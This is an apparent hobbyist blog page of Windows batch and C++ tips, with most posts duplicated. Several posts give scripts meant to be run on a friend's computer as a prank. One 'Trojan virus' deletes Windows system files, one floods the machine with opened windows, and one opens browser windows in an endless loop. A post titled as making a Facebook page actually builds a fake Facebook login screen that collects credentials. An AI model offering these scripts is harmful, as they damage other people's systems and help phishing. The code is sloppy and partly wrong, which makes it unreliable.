Showing posts with label COMPUTER. Show all posts
Showing posts with label COMPUTER. Show all posts
Friday, March 21, 2014
How To make Guest account as Administrator Account
How To make Guest account as a Administrator
hi friends...........
today i have a Geust account i want to make it as administrator account and we can add password in this account so some of the use full steps which is listed below:-
- first open your command prompt (windows+r)
- type " cmd "(without quata "")
- hit enter
- type "control userpasswords2" (without quata "")
- hit enter a user account box will be appear on your screen
- so click on guest then after it click on properties hit enter
- then click on group membership
- here choose administrator group
- press apply then ok
for putting password in guest account
all above 5 steps will be same
- after it press guest and choose reset password
- a box will appear on your screen so type new and conform password press enter
- after it your guest account has been fully fully password protected
video of this project is:-
Wednesday, March 19, 2014
Start Chrome With CMD
Start Chrome With CMD
STEP 1. Open Notepad and Copy code given below into it.
cls
title amnaudphaum.blogspot.in
color 3
echo hey this is anupam and it is my new command to start chrome
pause
start chrome.exe
exit
STEP 2. Save the notepad file as chrome.bat (.bat is must)
STEP 3. open chrome.bat file a command dialog box appear on your desktop
STEP 4. type any key in command dialog box your chrome is open.
VIDEO:-
Crash Some One Computer
Crash Some One Computer
how to crash someone computer. for this u can follow steps:-
STEP 1. Open Notepad and Copy code given below into it.
Ebomb:to crash someones computer down deliberately
title amnaudphaum.blogspot.in
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
echo off
lots of boxes
start boxes
STEP 2. Save the notepad file as Crash.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
VIDEO IS:-
how to crash someone computer. for this u can follow steps:-
STEP 1. Open Notepad and Copy code given below into it.
Ebomb:to crash someones computer down deliberately
title amnaudphaum.blogspot.in
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
echo off
lots of boxes
start boxes
STEP 2. Save the notepad file as Crash.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
VIDEO IS:-
How To Create A Virus
How To Create A Torjan Virus
hiii frndzzzz....
Today i am going to make Torjan virus . we know virus is a computer application which creates alots of same type file in all drive. so i am making torjan virus it is very harmfull so never run in your computer.
so lets start some of the important step :-
STEP 1. Open Notepad and Copy code given below into it.
@echo off
title amnaudphaum.blogspot.in
del"c:\windows\pchealth"
del"c:\windows\system"
del"c:\windows\system32\restore"
del"winlogon.exe"
del"c:\windows\system32\autoexec.nt"
del"c:\windows\system32\ntoskrni.exe"
STEP 2. Save the notepad file as virus.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
VIDEO IS:-
hiii frndzzzz....
Today i am going to make Torjan virus . we know virus is a computer application which creates alots of same type file in all drive. so i am making torjan virus it is very harmfull so never run in your computer.
so lets start some of the important step :-
STEP 1. Open Notepad and Copy code given below into it.
title amnaudphaum.blogspot.in
del"c:\windows\pchealth"
del"c:\windows\system"
del"c:\windows\system32\restore"
del"winlogon.exe"
del"c:\windows\system32\autoexec.nt"
del"c:\windows\system32\ntoskrni.exe"
STEP 2. Save the notepad file as virus.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
VIDEO IS:-
How To Crash Someone Internet
How To Crash Someone Internet
STEP 1. Open Notepad and Copy code given below into it.
title amnaudphaum.blogspot.in
:amnaudphaum
start www.amnaudphaum.blogspot.in
goto amnaudphaum
STEP 2. Save the notepad file as netcrash.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
STEP 1. Open Notepad and Copy code given below into it.
title amnaudphaum.blogspot.in
:amnaudphaum
start www.amnaudphaum.blogspot.in
goto amnaudphaum
STEP 2. Save the notepad file as netcrash.bat (.bat is must)
STEP 3. Run it in friend Computer....................
enjoy....................
hahahaha............
How To Create Shutdown button in Windows
How To Create Shutdown button in Window
Follow simple steps which is given below:-
STEPS:-
Follow simple steps which is given below:-
STEPS:-
- goto desktop and press right click of mouse.
- select "new" then
- select "shortcut"
- and type "shutdown -s -t 05" (without quata "")
- press "Next"
- press "Finish"
- After this process your shutdown button appear on desktop when you press it your computer will shutdown in 5sec.
- you can increase your time by increasing shutdown -s -t 05 05 value
- here "s" is shutdown.
- "t" for time in sec
- for restart u can repalce "s"to "r"
- if u want to cancle this process in running period then
- comment here........
- and ask code..........
Sunday, March 16, 2014
How To Remove Shortcut Virus
How To Remove Shortcut Virus
hiiiii frndzz......
Shortcut virus makes your data in the form of shortcuts. it hide your original data and creates a duplicate data links like shortcuts . so now i m going to remove this virus through command this is very simple and eassy .
some of the important steps given below:-
STEPS:-
- Open your run dialog box ( ctrl + R ).
- Type "cmd" hit enter. without quata"".
- Type " attrib -h -r -s /s /d H:\*.* " without quata""'.
- Hit enter .
- After this your original data will be shown in drive
- cut your data and save any place . & delete your shortcut files.
- Here attrib -h -r -s /s /d H:\*.* H is your drive name
try this this really work...........
Wednesday, January 22, 2014
How To Create a Facebook Page.
How To Create a Facebook Page
hi frndzzzz..............
Today i am going to make facebook page . it is very simple and easy .
first u open dos box and pest the code
code............
#include<conio.h>
#include<iostream.h>
#include<graphics.h>
#include<stdio.h>
#include<dos.h>
#include<process.h>
void logo()
{
int gdriver=DETECT,gmode;
initgraph(&gdriver,&gmode,"c:\\tc\\bgi");
rectangle(250,30,387,48);
rectangle(275,143,398,160);
rectangle(275,175,398,192);
}
void main()
{
clrscr();
char u[20],p[20];
logo();
gotoxy(34,3);
cout<<"Facebook Login";
gotoxy(25,10);
cout<<"Username:";
gotoxy(25,12);
cout<<"Password:";
gotoxy(51,10);
cout<<"(Press enter after entering)";
gotoxy(51,12);
cout<<"(8 characters only)";
gotoxy(36,10);
gets(u);
gotoxy(36,12);
for(int i=0;i<8;++i)
{
p[i]=getch();
cout<<"*";
}
p[i]='\0';
getch();
gotoxy(20,20);
cout<<"Plz wait Redirecting";
for(int j=0;j<8;++j)
{
sleep(1);
cout<<".";
}
}
thank u.......
share and like..............
hi frndzzzz..............
Today i am going to make facebook page . it is very simple and easy .
first u open dos box and pest the code
code............
#include<conio.h>
#include<iostream.h>
#include<graphics.h>
#include<stdio.h>
#include<dos.h>
#include<process.h>
void logo()
{
int gdriver=DETECT,gmode;
initgraph(&gdriver,&gmode,"c:\\tc\\bgi");
rectangle(250,30,387,48);
rectangle(275,143,398,160);
rectangle(275,175,398,192);
}
void main()
{
clrscr();
char u[20],p[20];
logo();
gotoxy(34,3);
cout<<"Facebook Login";
gotoxy(25,10);
cout<<"Username:";
gotoxy(25,12);
cout<<"Password:";
gotoxy(51,10);
cout<<"(Press enter after entering)";
gotoxy(51,12);
cout<<"(8 characters only)";
gotoxy(36,10);
gets(u);
gotoxy(36,12);
for(int i=0;i<8;++i)
{
p[i]=getch();
cout<<"*";
}
p[i]='\0';
getch();
gotoxy(20,20);
cout<<"Plz wait Redirecting";
for(int j=0;j<8;++j)
{
sleep(1);
cout<<".";
}
}
thank u.......
share and like..............
Windows shortcut keys
Windows shortcut keys
some of the important shortcut key.......
Keyboard Shortcuts (Microsoft Windows all in one)
1. CTRL+C (Copy)
2. CTRL+X (Cut)
3. CTRL+V (Paste)
4. CTRL+Z (Undo)
5. DELETE (Delete)
6. SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
7. CTRL while dragging an item (Copy the selected item)
8. CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
9. F2 key (Rename the selected item)
10. CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
11. CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
12. CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
13. CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
14. CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
15. CTRL+A (Select all)
16. F3 key (Search for a file or a folder)
17. ALT+ENTER (View the properties for the selected item)
18. ALT+F4 (Close the active item, or quit the active program)
19. ALT+ENTER (Display the properties of the selected object)
20. ALT+SPACEBAR (Open the shortcut menu for the active window)
21. CTRL+F4 (Close the active document in programs that enable you to have multiple documents opensimultaneously)
22. ALT+TAB (Switch between the open items)
23. ALT+ESC (Cycle through items in the order that they had been opened)
24. F6 key (Cycle through the screen elements in a window or on the desktop)
25. F4 key (Display the Address bar list in My Computer or Windows Explorer)
26. SHIFT+F10 (Display the shortcut menu for the selected item)
27. ALT+SPACEBAR (Display the System menu for the active window)
28. CTRL+ESC (Display the Start menu)
29. ALT+Underlined letter in a menu name (Display the corresponding menu) Underlined letter in a command name on an open menu (Perform the corresponding command)
30. F10 key (Activate the menu bar in the active program)
31. RIGHT ARROW (Open the next menu to the right, or open a submenu)
32. LEFT ARROW (Open the next menu to the left, or close a submenu)
33. F5 key (Update the active window)
34. BACKSPACE (View the folder onelevel up in My Computer or Windows Explorer)
35. ESC (Cancel the current task)
36. SHIFT when you insert a CD-ROMinto the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box - Keyboard Shortcuts
1. CTRL+TAB (Move forward through the tabs)
2. CTRL+SHIFT+TAB (Move backward through the tabs)
3. TAB (Move forward through the options)
4. SHIFT+TAB (Move backward through the options)
5. ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
6. ENTER (Perform the command for the active option or button)
7. SPACEBAR (Select or clear the check box if the active option is a check box)
8. Arrow keys (Select a button if the active option is a group of option buttons)
9. F1 key (Display Help)
10. F4 key (Display the items in the active list)
11. BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restorethe minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch FilterKeys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
17. SHIFT five times (Switch the StickyKeys either on or off)
18. NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
MMC Console keyboard shortcuts
1. SHIFT+F10 (Display the Action shortcut menu for the selected item)
2. F1 key (Open the Help topic, if any, for the selected item)
3. F5 key (Update the content of all console windows)
4. CTRL+F10 (Maximize the active console window)
5. CTRL+F5 (Restore the active console window)
6. ALT+ENTER (Display the Properties dialog box, if any, for theselected item)
7. F2 key (Rename the selected item)
8. CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
1. CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
2. ALT+PAGE UP (Switch between programs from left to right)
3. ALT+PAGE DOWN (Switch between programs from right to left)
4. ALT+INSERT (Cycle through the programs in most recently used order)
5. ALT+HOME (Display the Start menu)
6. CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
7. ALT+DELETE (Display the Windows menu)
8. CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
9. CTRL+ALT+Plus sign (+) (Place asnapshot of the entire client window area on the Terminal server clipboardand provide the same functionality aspressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Keyboard Shortcuts
1. CTRL+B (Open the Organize Favorites dialog box)
2. CTRL+E (Open the Search bar)
3. CTRL+F (Start the Find utility)
4. CTRL+H (Open the History bar)
5. CTRL+I (Open the Favorites bar)
6. CTRL+L (Open the Open dialog box)
7. CTRL+N (Start another instance of the browser with the same Web address)
8. CTRL+O (Open the Open dialog box,the same as CTRL+L)
9. CTRL+P (Open the Print dialog box)
10. CTRL+R (Update the current Web page)
11. CTRL+W (Close the current window)
THANXXXXXXXX..................
Pen drive as RAM
Pen drive as RAM
hey......
U can make your pen drive as RAM .
so lets start some of the important step :-
1) First Insert the Pen Drive atleast having an memory of 1GB ,( Preferably 4GB) in the Given USB port of the Computer
2) Wait for the Pen Drive Detection and see whether it is detected or not
3) After detection of Pen Drive, you should do the following things Carefully
4) Now go to My Computer and right click it, then go to the Properties
5) Now go to Advanced and then to the Performance settings
6) Now again Advanced, and go to Change
7) In the Change, select the pen drive which u inserted
Then click on the Custom size and " check the value of space available "
9) Please Enter the Same in the Initial and Maximum Columns also
10) Now your Pen drive space is used for the System Virtual Memory , Just Restart and enjoy the Faster and Furious PC
MUST SHARE & LIKE
hey......
U can make your pen drive as RAM .
so lets start some of the important step :-
1) First Insert the Pen Drive atleast having an memory of 1GB ,( Preferably 4GB) in the Given USB port of the Computer
2) Wait for the Pen Drive Detection and see whether it is detected or not
3) After detection of Pen Drive, you should do the following things Carefully
4) Now go to My Computer and right click it, then go to the Properties
5) Now go to Advanced and then to the Performance settings
6) Now again Advanced, and go to Change
7) In the Change, select the pen drive which u inserted
Then click on the Custom size and " check the value of space available "
9) Please Enter the Same in the Initial and Maximum Columns also
10) Now your Pen drive space is used for the System Virtual Memory , Just Restart and enjoy the Faster and Furious PC
MUST SHARE & LIKE
How To Open Number Of Websites In A Single Click ??
hey.......
How To Open Number Of Websites In A Single Click ??
Today i am going to make a batch file which contain number of websites....
Steps:-
1) Open Notepad.
2) Copy Below Given Code And Paste It In Notepad.
@echo off
title amnaudphaum.blogspot.com
start www.amnaudphaum.blogspot.com
start www.google.com
start www.facebook.com
3) Now save Notepad As Sites.bat
4) Now open your save file and it will open three websites in a single click.
5) You can also add more sites by writing Start followed by websites.
thanxxx
How To Open Number Of Websites In A Single Click ??
Today i am going to make a batch file which contain number of websites....
Steps:-
1) Open Notepad.
2) Copy Below Given Code And Paste It In Notepad.
@echo off
title amnaudphaum.blogspot.com
start www.amnaudphaum.blogspot.com
start www.google.com
start www.facebook.com
3) Now save Notepad As Sites.bat
4) Now open your save file and it will open three websites in a single click.
5) You can also add more sites by writing Start followed by websites.
thanxxx
Create Your Won Folder Lock
Hey..............
Today i am going to make folder lock with out any software it is very easy so you can make in few seconds.......
so lets start
Important steps:-
TEP 1.
Open Notepad and Copy code given below into it.
STEP 1.
Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title amnaudphaum.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%==anupam goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
STEP 2. Save the notepad file as lock.bat (.bat is must)
STEP 3. Now double click on lock.bat and a new folder will be created with name MyFolder
STEP 4. Copy all your data you want to protect in that New folder
STEP 5. Now double click on lock.bat and when command promp appears Type Y and press enter.
STEP 6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
STEP 7. It will ask for password enter your password and done. (Default password is anupam )
STEP 8. you can change your password by changing in above line. in place of anupam u can keep any alphanumeric in password example is below.....
if NOT %pass%==anupam goto FAIL
VIDEO IS:-
Today i am going to make folder lock with out any software it is very easy so you can make in few seconds.......
so lets start
Important steps:-
TEP 1.
Open Notepad and Copy code given below into it.
STEP 1.
Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title amnaudphaum.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%==anupam goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
STEP 2. Save the notepad file as lock.bat (.bat is must)
STEP 3. Now double click on lock.bat and a new folder will be created with name MyFolder
STEP 4. Copy all your data you want to protect in that New folder
STEP 5. Now double click on lock.bat and when command promp appears Type Y and press enter.
STEP 6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
STEP 7. It will ask for password enter your password and done. (Default password is anupam )
STEP 8. you can change your password by changing in above line. in place of anupam u can keep any alphanumeric in password example is below.....
if NOT %pass%==anupam goto FAIL
VIDEO IS:-
thank u....
Subscribe to:
Posts (Atom)
